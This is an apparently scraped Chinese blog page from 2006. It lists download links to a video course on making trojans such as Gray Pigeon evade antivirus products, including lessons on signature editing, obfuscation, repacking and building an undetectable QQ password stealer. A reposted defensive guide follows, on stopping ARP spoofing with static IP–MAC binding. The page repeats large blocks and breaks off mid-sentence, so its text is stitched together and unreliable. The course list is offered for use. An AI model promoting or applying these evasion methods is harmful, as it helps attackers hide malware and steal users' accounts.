地址:http://vip.cech.com.cn/315314/3999dc529978643643a2e60e698797bc850dc07f.down
第二十七课黑防鸽子最新7处内存特征码修改详解(一)
地址:http://vip.cech.com.cn/312754/91922115a907660c8d93e8c38796d5669fb13517.down
第二十七课黑防鸽子最新7处内存特征码修改详解(二)
地址:http://vip.cech.com.cn/312764/675a8818bdbb3baa03f96d0cf3a29c0b335146d3.down
第二十八课不改内存特征码过瑞星内存法
地址:http://vip.cech.com.cn/312784/b37e7d1c0c01c57fe2afd644ba0b058c350dbf46.down
第二十九课黑防鸽子过专杀演示与研究
地址:http://vip.cech.com.cn/312774/263b0dd6a9bb0d2269efce59a7c0ab2ceb4c226d.down
第三十课灰鸽子自带映射器vport1.0的免杀打造
地址:http://vip.cech.com.cn/312744/f1fa65e10addcc673d259c3ccce776e4b8c5fee6.down
第三十一课打造个人全免杀完美QQ盗无限制版
地址:http://vip.cech.com.cn/312734/980442abd8b9cde2eff842a4cf7af0eeca7cba09.down
地址:http://vip.cech.com.cn/310824/276e75a9fa99ff4b9ab350f3f328b8db49e75162.down
第二课免杀学习方法技巧与环境详解
地址:http://vip.cech.com.cn/310854/b1938a1a98b7d09cb85f004b561ecba7eab913a1.down
第三课06年流行免杀工具终极组合技巧篇
地址:http://vip.cech.com.cn/310844/51e6c906247d3cef28c38e9cc115928f2b8b9ba8.down
第四课手工加密加花方法演示
地址:http://vip.cech.com.cn/311954/9b09c406166b09612d996c902a222cfbf90afa30.down
第五课免杀工具灵活组合打造超强免杀木马
地址:http://vip.cech.com.cn/311694/ded30f29ae6a8e0c12165dc60ab7ab69ce6e877f.down
第六课myccl定位复合特征码原理与使用介绍
地址:http://vip.cech.com.cn/315334/14bd37ecc46e6063f17e3186249aac9c1ffd1cb8.down
第七课实战myccl定位文件复合特码
地址:http://vip.cech.com.cn/315614/da57136fb9cdf0e14806b81d9f5029646e914502.down
第八课实战myccl定位内存复合特码
地址:http://vip.cech.com.cn/311904/63e50e2dbce4b4581e04da8cab976d1cabf40c83.down
第九课mycll综合定位特征码技巧总结篇
地址:http://vip.cech.com.cn/315324/e47f5eeb76dcbf4372c517e89cced7c956af3804.down
第十课编写花指令之必备汇编知识总结
地址:http://vip.cech.com.cn/312804/d8e69eea48c072e8b8fd2a64bc27f9c193777377.down
第十二课编写自己免杀花指令方法总结一
地址:http://vip.cech.com.cn/312794/be9536d72b63a818906b0cd64143f38eab4de510.down
第十三课编写自己免杀花指令方法总结二
地址:http://vip.cech.com.cn/315644/0b5f183220100e1e0b9110272690d3c66f70741a.down
第十四课花指令轻松过卡巴之终极秘籍总结
地址:http://vip.cech.com.cn/315674/fc45898af1dc4133b10aace2978441854f4203b8.down
第十五课修改PE头反调试免杀法(一)
地址:http://vip.cech.com.cn/311674/9021cd92a60ca01522e7bbf6d01a0f8409a3bf22.down
第十五课修改PE头反调试免杀法(二)
地址:http://vip.cech.com.cn/311574/d1dd11bdaa934f8ac9cb2eb22c36e741bd905768.down
第十六课绝密免杀最新技术的揭密与研究过程
地址:http://vip.cech.com.cn/311704/fa621f89421c08f248daa557ef5c089e6af31617.down
第十七课UPX壳的几种经典改壳免杀方法
地址:http://vip.cech.com.cn/311914/30be57dbb2eabdb2690f608732887f7ad7a7775b.down
第十八课北斗壳的几种超级免杀改壳方法(一)
地址:http://vip.cech.com.cn/312004/3ce9a8a1ba6e8edb891e28b82e1c89b149a55a16.down
第十八课北斗壳的几种超级免杀改壳方(二)
地址:http://vip.cech.com.cn/311994/afbde4bfeb58d4ea22203d5254a159ccf42f2e94.down
第十九课常见压缩壳的免杀修改方法总结篇(一)
地址:http://vip.cech.com.cn/311974/4f5882ec0e65f5797c033a528cb8acf11af7ac5a.down
第十九课常见压缩壳的免杀修改方法总结篇(二)
地址:http://vip.cech.com.cn/311984/56499a606d430ade24d810d6743c906ca0253968.down
第二十课免杀卡巴思路与技巧总结 :
地址:http://vip.cech.com.cn/311964/64f6989b638d64f0bca23edec29bc7917074d6c9.down
第二十一课 06年木马免杀常见疑难问题及解决策略篇
地址:http://vip.cech.com.cn/311864/37b71b55fd093ea0dcc53540bb5cd7eedb3239e9.down
第二十一课 06年木马免杀常见疑难问题及解决策略篇[补]
地址:http://vip.cech.com.cn/311874/dc6276733edb2dce52a0070d9da0c5a56e9fa34b.down
第二十二课06年各种杀毒软件查杀特点与免杀对策方案
地址:http://vip.cech.com.cn/312134/4aa36886b4370ad4cd08f00760b4647521149445.down
第二十三课06年综合木马免杀方案精华浓缩与总结
地址:http://vip.cech.com.cn/311884/788fdf3bd3b7c1f5aa4190f5dae741cd415fae99.down
第二十四课2006VIP灰鸽子最新免杀演示
地址:http://vip.cech.com.cn/312154/fc5f13a6dc8c422c8be5772caea76207dd0414e4.down
第二十四课2006VIP灰鸽子最新免杀演示
地址:http://vip.cech.com.cn/312164/782dd8e0ec0c0b64146fa1bce255b577204be56b.down
第二十五课黑防鸽子全免杀演示
地址:http://vip.cech.com.cn/312144/18327576c215c728033c87b9be6384d0aac45fb9.down
第二十六课黑防鸽子免杀策略分析
地址:http://vip.cech.com.cn/315314/3999dc529978643643a2e60e698797bc850dc07f.down
第二十七课黑防鸽子最新7处内存特征码修改详解(一)
地址:http://vip.cech.com.cn/312754/91922115a907660c8d93e8c38796d5669fb13517.down
第二十七课黑防鸽子最新7处内存特征码修改详解(二)
地址:http://vip.cech.com.cn/312764/675a8818bdbb3baa03f96d0cf3a29c0b335146d3.down
第二十八课不改内存特征码过瑞星内存法
地址:http://vip.cech.com.cn/312784/b37e7d1c0c01c57fe2afd644ba0b058c350dbf46.down
第二十九课黑防鸽子过专杀演示与研究
地址:http://vip.cech.com.cn/312774/263b0dd6a9bb0d2269efce59a7c0ab2ceb4c226d.down
第三十课灰鸽子自带映射器vport1.0的免杀打造
地址:http://vip.cech.com.cn/312744/f1fa65e10addcc673d259c3ccce776e4b8c5fee6.down
第三十一课打造个人全免杀完美QQ盗无限制版
地址:http://vip.cech.com.cn/312734/980442abd8b9cde2eff842a4cf7af0eeca7cba09.down
标签: 高级免杀
庆祝下
作者:admin 日期:2006-12-12 23:18
解决ARP欺骗和攻击的方法和解决工具
作者:admin 日期:2006-12-09 15:03
唉ARP欺骗是个弱智低能的一种攻击 懂得协议的人都知道
但是还是有很多网吧受到攻击 本人实在没有时间于是转来此文章一篇
在局域网中,通信前必须通过ARP协议来完成IP地址转换为第二层物理地址(即MAC地址)。ARP协议对网络安全具有重要的意义。通过伪造IP地址和MAC地址实现ARP欺骗,对网络的正常传输和安全都是一个很严峻的考验。
“又掉线了!!!”每当听到客户的抱怨声一片响起,网管员就坐立不安。其实,此起彼伏的瞬间掉线或大面积的断网大都是ARP欺骗在作怪。ARP欺骗攻击已经成了破坏网吧经营的罪魁祸首,是网吧老板和网管员的心腹大患。
目前知道的带有ARP欺骗功能的软件有“QQ第六感”、“网络执法官”、“P2P终结者”、“网吧传奇杀手”等,这些软件中,有些是人为手工操作来破坏网络的,有些是做为病毒或者木马出现,使用者可能根本不知道它的存在,所以更加扩大了ARP攻击的杀伤力。
从影响网络连接通畅的方式来看,ARP欺骗有两种攻击可能,一种是对路由器ARP表的欺骗;另一种是对内网电脑ARP表的欺骗,当然也可能两种攻击同时进行。不管理怎么样,欺骗发送后,电脑和路由器之间发送的数据可能就被送到错误的MAC地址上,从表面上来看,就是“上不了网”,“访问不了路由器”,“路由器死机了”,因为一重启路由器,ARP表会重建,如果ARP攻击不是一直存在,就会表现为网络正常,所以网吧业主会更加确定是路由器“死机”了,而不会想到其他原因。为此,宽带路由器背了不少“黑锅”,但实际上应该ARP协议本身的问题。好了,其他话就不多说,让我们来看看如何来防止ARP的欺骗吧。
上面也已经说了,欺骗形式有欺骗路由器ARP表和欺骗电脑ARP两种,我们的防护当然也是两个方面的,首先在路由器上进行设置,来防止路由器的ARP表被恶意的ARP数据包更改;其次,我们也会在电脑上进行一下设置,来防止电脑的ARP表受恶意更改。两个方面的设置都是必须的,不然,如果您只设置了路由器的防止ARP欺骗功能而没有设置电脑,电脑被欺骗后就不会把数据包发送到路由器上,而是发送到一个错误的地方,当然无法上网和访问路由器了。
一、设置前准备
当使用了防止ARP欺骗功能(IP和MAC绑定功能)后,最好是不要使用动态IP,因为电脑可能获取到和IP与MAC绑定条目不同的IP,这时候可能会无法上网,通过下面的步骤来避免这一情况发生吧。
1.把路由器的DHCP功能关闭:打开路由器管理界面,“DHCP服务器”->“DHCP服务”,把状态由默认的“启用”更改为“不启用”,保存并重启路由器。
2.给电脑手工指定IP地址、网关、DNS服务器地址,如果您不是很清楚当地的DNS地址,可以咨询您的网络服务商。
二、设置路由器防止ARP欺骗
打开路由器的管理界面可以看到如下的左侧窗口:
可以看到比之前的版本多出了“IP与MAC绑定”的功能,这个功能除了可以实现IP和MAC绑定外,还可以实现防止ARP欺骗功能。
打开“静态ARP绑定设置”窗口如下:
注意,默认情况下ARP绑定功能是关闭,请选中启用后,点击保存来启用。
打开“ARP映射表”窗口如下:
这是路由器动态学习到的ARP表,可以看到状态这一栏显示为“未绑定”。如果确认这一个动态学习的表没有错误(如果网络是正常运行的,而且不同IP对应的MAC不一样,一般就没有错误)。我们把这一个表进行绑定,并且保存为静态表,这样路由器重启后这些条目都会存在,达到一劳永逸的效果。
点击“全部绑定”,可以看到下面界面:
可以看到状态中已经为已绑定,这时候,路由器已经具备了防止ARP欺骗的功能,上面的示范中只有三个条目,如果您的电脑多,操作过程也是类似的。有些条目如果没有添加,也可以下次补充上去。除了这种利用动态学习到的ARP表来导入外,也可以使用手工添加的方式,只要知道电脑的MAC地址,手工添加相应条目就可。
为了让下一次路由器重新启动后这些条目仍然存在,我们点击了“全部导入”,然后再次打开“静态ARP绑定设置”窗口:
可以看到静态条目已经添加,而且在绑定这一栏已经打上勾,表示启用相应条目的绑定。到此,我们已经成功设置路由器来防止192.168.1.111、192.168.1.112、222.77.77.1这三个IP受ARP欺骗的攻击,如果有更多的电脑,只是条目数不同,设置过程当然是一样的,不是很难吧?
三、设置电脑防止ARP欺骗
路由器已经设置了防止ARP欺骗功能,接下来我们就来设置电脑的防止ARP欺骗了。微软的操作系统中都带有ARP这一命令行程序,我们可以在windows的命令行界面来使用它。打开windows的命令行提示符如下:
通过“arp-s +路由器IP如192.168.1.1+路由器的MAC地址”这一条命令来实现对路由器的ARP条目的静态绑定,可以看到在arp -a 命令的输出中,已经有了我们刚才添加的条目,Type类型
但是还是有很多网吧受到攻击 本人实在没有时间于是转来此文章一篇
在局域网中,通信前必须通过ARP协议来完成IP地址转换为第二层物理地址(即MAC地址)。ARP协议对网络安全具有重要的意义。通过伪造IP地址和MAC地址实现ARP欺骗,对网络的正常传输和安全都是一个很严峻的考验。
“又掉线了!!!”每当听到客户的抱怨声一片响起,网管员就坐立不安。其实,此起彼伏的瞬间掉线或大面积的断网大都是ARP欺骗在作怪。ARP欺骗攻击已经成了破坏网吧经营的罪魁祸首,是网吧老板和网管员的心腹大患。
目前知道的带有ARP欺骗功能的软件有“QQ第六感”、“网络执法官”、“P2P终结者”、“网吧传奇杀手”等,这些软件中,有些是人为手工操作来破坏网络的,有些是做为病毒或者木马出现,使用者可能根本不知道它的存在,所以更加扩大了ARP攻击的杀伤力。
从影响网络连接通畅的方式来看,ARP欺骗有两种攻击可能,一种是对路由器ARP表的欺骗;另一种是对内网电脑ARP表的欺骗,当然也可能两种攻击同时进行。不管理怎么样,欺骗发送后,电脑和路由器之间发送的数据可能就被送到错误的MAC地址上,从表面上来看,就是“上不了网”,“访问不了路由器”,“路由器死机了”,因为一重启路由器,ARP表会重建,如果ARP攻击不是一直存在,就会表现为网络正常,所以网吧业主会更加确定是路由器“死机”了,而不会想到其他原因。为此,宽带路由器背了不少“黑锅”,但实际上应该ARP协议本身的问题。好了,其他话就不多说,让我们来看看如何来防止ARP的欺骗吧。
上面也已经说了,欺骗形式有欺骗路由器ARP表和欺骗电脑ARP两种,我们的防护当然也是两个方面的,首先在路由器上进行设置,来防止路由器的ARP表被恶意的ARP数据包更改;其次,我们也会在电脑上进行一下设置,来防止电脑的ARP表受恶意更改。两个方面的设置都是必须的,不然,如果您只设置了路由器的防止ARP欺骗功能而没有设置电脑,电脑被欺骗后就不会把数据包发送到路由器上,而是发送到一个错误的地方,当然无法上网和访问路由器了。
一、设置前准备
当使用了防止ARP欺骗功能(IP和MAC绑定功能)后,最好是不要使用动态IP,因为电脑可能获取到和IP与MAC绑定条目不同的IP,这时候可能会无法上网,通过下面的步骤来避免这一情况发生吧。
1.把路由器的DHCP功能关闭:打开路由器管理界面,“DHCP服务器”->“DHCP服务”,把状态由默认的“启用”更改为“不启用”,保存并重启路由器。
2.给电脑手工指定IP地址、网关、DNS服务器地址,如果您不是很清楚当地的DNS地址,可以咨询您的网络服务商。
二、设置路由器防止ARP欺骗
打开路由器的管理界面可以看到如下的左侧窗口:
可以看到比之前的版本多出了“IP与MAC绑定”的功能,这个功能除了可以实现IP和MAC绑定外,还可以实现防止ARP欺骗功能。
打开“静态ARP绑定设置”窗口如下:
注意,默认情况下ARP绑定功能是关闭,请选中启用后,点击保存来启用。
打开“ARP映射表”窗口如下:
这是路由器动态学习到的ARP表,可以看到状态这一栏显示为“未绑定”。如果确认这一个动态学习的表没有错误(如果网络是正常运行的,而且不同IP对应的MAC不一样,一般就没有错误)。我们把这一个表进行绑定,并且保存为静态表,这样路由器重启后这些条目都会存在,达到一劳永逸的效果。
点击“全部绑定”,可以看到下面界面:
可以看到状态中已经为已绑定,这时候,路由器已经具备了防止ARP欺骗的功能,上面的示范中只有三个条目,如果您的电脑多,操作过程也是类似的。有些条目如果没有添加,也可以下次补充上去。除了这种利用动态学习到的ARP表来导入外,也可以使用手工添加的方式,只要知道电脑的MAC地址,手工添加相应条目就可。
为了让下一次路由器重新启动后这些条目仍然存在,我们点击了“全部导入”,然后再次打开“静态ARP绑定设置”窗口:
可以看到静态条目已经添加,而且在绑定这一栏已经打上勾,表示启用相应条目的绑定。到此,我们已经成功设置路由器来防止192.168.1.111、192.168.1.112、222.77.77.1这三个IP受ARP欺骗的攻击,如果有更多的电脑,只是条目数不同,设置过程当然是一样的,不是很难吧?
三、设置电脑防止ARP欺骗
路由器已经设置了防止ARP欺骗功能,接下来我们就来设置电脑的防止ARP欺骗了。微软的操作系统中都带有ARP这一命令行程序,我们可以在windows的命令行界面来使用它。打开windows的命令行提示符如下:
通过“arp-s +路由器IP如192.168.1.1+路由器的MAC地址”这一条命令来实现对路由器的ARP条目的静态绑定,可以看到在arp -a 命令的输出中,已经有了我们刚才添加的条目,Type类型